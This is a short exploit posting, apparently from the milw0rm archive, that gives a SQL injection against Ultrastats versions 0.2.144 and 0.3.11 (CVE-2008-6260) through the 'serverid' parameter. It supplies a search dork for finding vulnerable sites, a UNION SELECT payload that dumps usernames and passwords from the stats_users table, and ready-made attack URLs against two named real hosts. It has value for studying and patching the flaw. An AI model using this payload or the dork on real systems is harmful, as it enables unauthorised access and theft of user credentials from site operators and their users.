Ultrastats 0.2.144/0.3.11 - 'serverid' SQL Injection

Related Vulnerabilities: CVE-2008-6260  
Publish Date: 17 Nov 2008
Author: eek

				              ####`   `####`   `####
				             #####|||        |||#####
				            ######|||        |||######
				           #######||| ||##|| |||#######
      				             _|   #++++++++++++|___
       				            |        ++++++++      |
      				            |_          ++        _|
#                         Ultrastats exploit by  eeee eeee e   e                                       #
#                         -------------------->  8    8    8   8                                       # 
#                                                8eee 8eee 8eee8e                                      #
#                                                88   88   88   8                                      #
#                                                88ee 88ee 88   8 ---> mail: hexdez@nm.ru              #
#                                                -> Greetz to:                                         #
#             th0br0,magicwolf,_d4vid,ekaF,psychobarbie,d3hydr8,modda,#chaostreffpunkt                 #
#                                  -> Ultrastats all Versions?! Sql Injection                          #
#                                        (Version 0.3.11 & 0.2.144 tested)                             #
#                                      -> Dork: inurl:"index.php?serverid="                            #
#                                                  -> Injection:                                       #
# Querry -> index.php?serverid=2+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--  #
#                                              and watch the Source  ;)                                #
#                                                                                                      #
#                                                 -> Example:                                          #
# -> v.  0.3.11:                                                                                       #
#                                                                                                      ##
# http://cod2demo.ultrastats.org/index.php?serverid=2+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--
# -> v. 0.2.144: 
# http://www.ultrastats.x2server4u.de/index.php?serverid=6+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--

# milw0rm.com [2008-11-17]